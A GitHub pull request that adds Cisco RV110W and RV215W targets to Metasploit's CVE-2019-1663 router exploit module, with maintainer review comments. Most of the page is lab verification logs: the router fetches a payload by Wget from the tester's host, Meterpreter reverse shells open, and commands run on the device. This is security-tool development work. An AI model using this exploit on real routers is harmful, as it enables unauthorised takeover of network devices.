Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2019-1663 - Add support for RV110W and RV215W models. #12133

Merged
merged 8 commits into from Aug 30, 2019

Conversation

@QKaiser
Copy link
Contributor

commented Jul 27, 2019

This pull request add support for Cisco RV110W and RV215W models that are affected by the same issue than RV130 (CVE-2019-1663).

I wrote a check function that fingerprint firmware versions based on a file that is available to unauthenticated users. This is the best method I could find given the httpd server does not leak information through headers. If you can think of a better method let me know :)

I used the existing method of deprecation given that #12027 hasn't landed yet. I'll let @wvu-r7 refactor the module with proper deprecation method when it lands.

One open question is whether it is possible to set a default payload based on the chosen target ? So that it uses linux/armle/meterpreter_reverse_tcp for RV130 and linux/mipsle/meterpreter_reverse_tcp for RV110W/RV215W.

Verification

Cisco RV110W (firmware version 1.1.0.9)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.1.0.9
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 0
target => 0
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/Oeg2hQAjOd
[*] Client 192.168.1.1 (Wget) requested /Oeg2hQAjOd
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 14 opened (192.168.1.100:4444 -> 192.168.1.1:40785) at 2019-07-18 21:25:56 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 1381 created.
Channel 1 created.
nvram get fw_version
1.1.0.9
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 14 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.0.9)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.0.9
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 1
target => 1
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/E8DN5bSj5D
[*] Client 192.168.1.1 (Wget) requested /E8DN5bSj5D
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 12 opened (192.168.1.100:4444 -> 192.168.1.1:47864) at 2019-07-18 21:11:05 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 472 created.
Channel 1 created.
nvram get fw_version
1.2.0.9
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 12 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.0.10)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.0.10
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 2
target => 2
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/4VFaoatLb
[*] Client 192.168.1.1 (Wget) requested /4VFaoatLb
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 9 opened (192.168.1.100:4444 -> 192.168.1.1:35866) at 2019-07-18 20:58:33 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 544 created.
Channel 1 created.
nvram get fw_version
1.2.0.10
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 9 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.1.4)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 3
target => 3
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/2nlTdxRvlLf
[*] Client 192.168.1.1 (Wget) requested /2nlTdxRvlLf
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 6 opened (192.168.1.100:4444 -> 192.168.1.1:49181) at 2019-07-18 19:26:06 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 520 created.
Channel 1 created.
nvram get fw_version
1.2.1.4
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 6 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.1.7)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 4
target => 4
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/9f1U7su
[*] Client 192.168.1.1 (Wget) requested /9f1U7su
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 4 opened (192.168.1.100:4444 -> 192.168.1.1:60217) at 2019-07-18 19:16:04 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 694 created.
Channel 1 created.
nvram get fw_version
1.2.1.7
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 4 closed.  Reason: User exit

Cisco RV215W (firmware version 1.1.0.5)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.1.0.5
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 6
target => 6
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/g4KoWbXVnJ
[*] Local IP: http://192.168.1.100:8080/g4KoWbXVnJ
[*] Client 192.168.1.1 (Wget) requested /g4KoWbXVnJ
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 16 opened (192.168.1.100:4444 -> 192.168.1.1:37543) at
2019-07-26 15:48:47 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 782 created.
Channel 1 created.
nvram get fw_version
1.1.0.5
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 16 closed.  Reason: User exit

Cisco RV215W (firmware version 1.1.0.6)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.1.0.6
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 7
target => 7
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/ubI9mgBj
[*] Local IP: http://192.168.1.100:8080/ubI9mgBj
[*] Client 192.168.1.1 (Wget) requested /ubI9mgBj
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 14 opened (192.168.1.100:4444 -> 192.168.1.1:34516) at
2019-07-26 15:42:11 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 754 created.
Channel 1 created.
nvram get fw_version
1.1.0.6
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 14 closed.  Reason: User exit

Cisco RV215W (firmware version 1.2.0.14)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.2.0.14 or 1.2.0.15
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 8
target => 8
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/Fv3IrUrcS5Xb37
[*] Local IP: http://192.168.1.100:8080/Fv3IrUrcS5Xb37
[*] Client 192.168.1.1 (Wget) requested /Fv3IrUrcS5Xb37
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 12 opened (192.168.1.100:4444 -> 192.168.1.1:56255) at
2019-07-26 15:35:54 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 730 created.
Channel 1 created.
nvram get fw_version
1.2.0.14
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 12 closed.  Reason: User exit

Cisco RV215W (firmware version 1.2.0.15)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.2.0.14 or 1.2.0.15
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 9
target => 9
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/5JDmdNNlZSjCO
[*] Local IP: http://192.168.1.100:8080/5JDmdNNlZSjCO
[*] Client 192.168.1.1 (Wget) requested /5JDmdNNlZSjCO
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 10 opened (192.168.1.100:4444 -> 192.168.1.1:49636) at
2019-07-26 15:29:18 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 807 created.
Channel 1 created.
nvram get fw_version
1.2.0.15
exit
exmeterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 10 closed.  Reason: User exit

Cisco RV215W (firmware version 1.3.0.7)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1
(not vulnerable), 1.3.1.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/Ulsp7WNdRpwoJA
[*] Local IP: http://192.168.1.100:8080/Ulsp7WNdRpwoJA
[*] Client 192.168.1.1 (Wget) requested /Ulsp7WNdRpwoJA
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 5 opened (192.168.1.100:4444 -> 192.168.1.1:56965) at
2019-07-26 15:15:14 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 792 created.
Channel 1 created.
nvram get fw_version
1.3.0.7
exit
emeterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 5 closed.  Reason: User exit

Cisco RV215W (firmware version 1.3.0.8)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1
(not vulnerable), 1.3.1.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/hdtlzE
[*] Local IP: http://192.168.1.100:8080/hdtlzE
[*] Client 192.168.1.1 (Wget) requested /hdtlzE
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.1:34656) at
2019-07-26 14:58:59 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 770 created.
Channel 1 created.
nvraw get fw_version
/bin/sh: nvraw: not found
nvram get fw_version
1.3.0.8
exit
emeterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 5 closed.  Reason: User exit

@bcoles bcoles added the module label Jul 27, 2019

@wvu-r7 wvu-r7 self-assigned this Jul 28, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 1, 2019

Hi, @QKaiser. I probably won't be able to get the new devices to test, so I'm relying on you for that. :)

One open question is whether it is possible to set a default payload based on the chosen target ? So that it uses linux/armle/meterpreter_reverse_tcp for RV130 and linux/mipsle/meterpreter_reverse_tcp for RV110W/RV215W.

Yep! You can set DefaultOptions as per #10471.

@QKaiser

This comment has been minimized.

Copy link
Contributor Author

commented Aug 2, 2019

Hi, @QKaiser. I probably won't be able to get the new devices to test, so I'm relying on you for that. :)

Thanks for trusting me with this.

One open question is whether it is possible to set a default payload based on the chosen target ? So that it uses linux/armle/meterpreter_reverse_tcp for RV130 and linux/mipsle/meterpreter_reverse_tcp for RV110W/RV215W.

Yep! You can set DefaultOptions as per #10471.

Great ! I just did that in the latest commit.

@wvu-r7 wvu-r7 referenced this pull request Aug 22, 2019
14 of 14 tasks complete
@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 22, 2019

I'll get this updated with #12223 once that lands, then I'll land this.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 30, 2019

@QKaiser: Hey, #12223 landed, and I've refactored deprecation here. Just waiting on tests to pass, and then I'll land this!

wvu-r7 added a commit that referenced this pull request Aug 30, 2019

@wvu-r7 wvu-r7 merged commit b0b7289 into rapid7:master Aug 30, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 30, 2019

Release Notes

The exploit/linux/http/cisco_rv130_rmi_rce module has been moved to exploit/linux/http/cve_2019_1663_cisco_rmi_rce. Targets have also been added for RV110W and RV215W.

jmartin-r7 added a commit that referenced this pull request Aug 30, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
4 participants
You can’t perform that action at this time.